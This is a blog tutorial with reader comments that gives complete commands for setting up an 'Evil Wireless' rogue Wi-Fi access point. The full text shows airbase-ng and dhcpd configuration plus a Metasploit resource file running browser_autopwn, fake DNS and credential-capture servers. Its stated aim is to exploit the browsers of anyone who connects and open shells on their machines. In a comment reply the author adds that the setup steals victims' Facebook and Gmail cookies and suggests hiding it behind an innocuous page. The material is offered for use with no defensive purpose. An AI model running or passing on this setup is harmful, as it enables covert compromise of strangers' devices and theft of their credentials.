The Evil Access Point!
In this tutorial we are going to create an evil wifi access point! when someone connects to it and uses some services like “pop3,imap,ftp,smtp,http,https,dns” these services will be tested for all the expoits that maches them in the metasploit framework 3 and tries to exploit each one , when one of them successly exploited a session will be opened for a remote prompt or shell depends on the system being attacked.
How to configure that evil access point :
* Set your card to monitor mode
* Create the access point using airbase-ng
* Configure the IPs
* Configure the dynamic host protocol server (dhcpd)
* Change the maximum transfer unit to ~1800
* Run metasploit framework
Thats it so lets start working on it :
* Set your card to monitor mode
To set your card to monitor mode you’ll need to use aircrack-ng suit a tool that comes with it called airmon-ng if you don’t have that suit download,compile it and install it
qnix@~$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng qnix@~$ cd aircrack-ng/ qnix@~/aircrack-ng$ make qnix@~/aircrack-ng$ make install |
then use airmon to set your wlan0 interface to monitor mode
qnix@~$ airmon-ng start wlan0 Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0) |
Done now our monitor mode interface called mon0 which we are going to use throgh this tutorial
* Create the access point using airbase-ng:
Now we are going to create a wifi access point using airbase-ng that we’v installed from aircrack-ng suit.
qnix@~$ airbase-ng -e "Evil Wireless" -v mon0 11:21:34 Created tap interface at0 11:21:34 Access Point with BSSID 00:**:**:**:**:** started. |
That’s it our access point is active and running.
* Configure the IPs
Set the IPs of at0 interface
qnix@~$ ifconfig at0 10.0.0.1 netmask 255.255.255.0 |
* Configure the dynamic host protocol server (dhcpd) :
a dynamic host protocol daemon is used to configure the IPs and everything related to them, if you don’t have it and your using a debian-based system then you can install it form APT
qnix@~$ apt-get install dhcp3-server |
Then we need to create a configure file for dhcp3 to use ex. ( in /etc/dhcpd3/evil-wireless.conf )
option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; } |
for more information about creating a configure file check out the manual page of dhcpd.conf
qnix@~$ man dhcpd.conf |
and now , we have to run the dhcpd using our configure file
qnix@~$ dhcpd3 -cf /etc/dhcp3/evil-wireless.conf Internet Systems Consortium DHCP Server V3.0.6 Copyright 2004-2007 Internet Systems Consortium. All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/ Wrote 1 leases to leases file. Listening on LPF/at0/00:1f:3c:3f:e8:13/10.0.0/24 Sending on LPF/at0/00:1f:3c:3f:e8:13/10.0.0/24 Sending on Socket/fallback/fallback-net |
* Change the maximum transfer unit to ~1800 :
Just type
qnix@~$ ifconfig mon0 mtu 1800 |
if you had some errors or your card couldn’t change the mtu then try changing the mtu of at0
qnix@~$ ifconfig at0 mtu 1400 |
* Run metasploit framework :
you have to download metasploit framework if you don’t have it :
qnix@~$ svn co http://metasploit.com/svn/framework3/trunk msf3 |
and don’t forget to download sqlite3 and activerecord support for ruby because we are going to use it to create a sqlite3 database that will store everything in it.
qnix@~$ gem install activerecord sqlite3-ruby |
Now create an RC file for the framework to load all the commands , so you don’t have to type them one by one each time you want to do it.!
load db_sqlite3 db_create /root/evilwireless.db use auxiliary/server/browser_autopwn setg AUTOPWN_HOST 10.0.0.1 setg AUTOPWN_PORT 55550 setg AUTOPWN_URI /ads set LHOST 10.0.0.1 set LPORT 45000 set SRVPORT 55550 set URIPATH /ads run use auxiliary/server/capture/pop3 set SRVPORT 110 set SSL false run use auxiliary/server/capture/pop3 set SRVPORT 995 set SSL true run use auxiliary/server/capture/ftp run use auxiliary/server/capture/imap set SSL false set SRVPORT 143 run use auxiliary/server/capture/imap set SSL true set SRVPORT 993 run use auxiliary/server/capture/smtp set SSL false set SRVPORT 25 run use auxiliary/server/capture/smtp set SSL true set SRVPORT 465 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 5353 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 53 run use auxiliary/server/capture/http set SRVPORT 80 set SSL false run use auxiliary/server/capture/http set SRVPORT 8080 set SSL false run use auxiliary/server/capture/http set SRVPORT 443 set SSL true run use auxiliary/server/capture/http set SRVPORT 8443 set SSL true run |
Run it and see what happens
qnix@~$ ./msfconsole -r evilwireless.rc |
Thats it
* What happens now ?
if anyones search for a wireless network he’ll detect the “evil wireless” if he connect to it he’ll get an ip of 10.0.0.4 for example and now if he opens the browser and go http://www.google.com/ the metasploit framework will tests his browser for all the exploits in it database and if one of them successed it will give you a session to the user prompt or shell, everything will be saved in /root/evilwireless.db as a sqlite3 database..
No trackbacks yet.
The Art of Pivoting and Enumeration
about 2 months ago - 2 comments
While I was pen-testing a network there was one of the boxes a Windows 7 which was connected to an internal network that I needed to reach, enumerate and PWNE. Some information about the network Pentester (me): 192.168.1.30 Windows 7 (the one which has access to an internal network): 192.168.1.200 Internal network: 10.10.10.0 / 255.255.255.0 I have
about 1 year ago
والله من جد ايفل الحين بيتادب الي يدخل على انترنت غيره ههه ^-^
about 1 year ago
Nice!!
about 1 year ago
dude this is great, and props to your blog it has been just the thing I need to expand my knowledge in some of these more obscure areas. Great work!!!
I look forward to reading more soon
about 1 year ago
Thanks a lot i really appreciate your comments
hehe i don’t really get much like these comments!!
anyways i am busy these days in work , i will get free time soon
and i will start writing again some new things!
so check out the blog next time!
about 10 months ago
nice nice man, great job keep it that way
just to ask, shouldn’t we add some routing rules? like masquerading to get this stuff working or airbase is taking care of that? I am asking this because i’m trying to setup an linux router. Wireless drivers do not support Master mode, but with aircrack tools setting my wifi card as AP is posible
This is the setup: eth1 with ppp0 is the wan, eth1 is the wired lan and wlan0 (in my case at0) wireless lan. To make it possible wired lan to function i’ve added some iptable rules. My question is should i do the same for the wireless lan. This is out of the scope of this how to, but if you can please give me an answer. Thanks in advance. Appreciate and respect to you. Greets
about 9 months ago
@taske
If you are willing to make that AP accessible to the internet, you must add rules masquerading and other things, just Google about sharing internet connection in Linux and you’ll find what you want, or use a tool like Firestarter for an easy configuration. This technique is not intended to be accessible to internet, it just tests all the Metasploit browser database and try to exploit the victim, and steals the victims cookies like “facebook,gmail,myspace,hi5,..etc”
there’s a good idea if you want to add an internet support, you could make like an with the a dynamic evil page that does this technique, so the victim won’t feel anything strange with this network. but his browser might freeze ! so make sure that you’ll chose the correct options you want.
about 9 months ago
Bookmarked
about 6 months ago
Hello! I am following your guide, but I can not understand where I have to create the RC. I can not understand how the file extension should be and in what directory should I create it. thanks for your answer!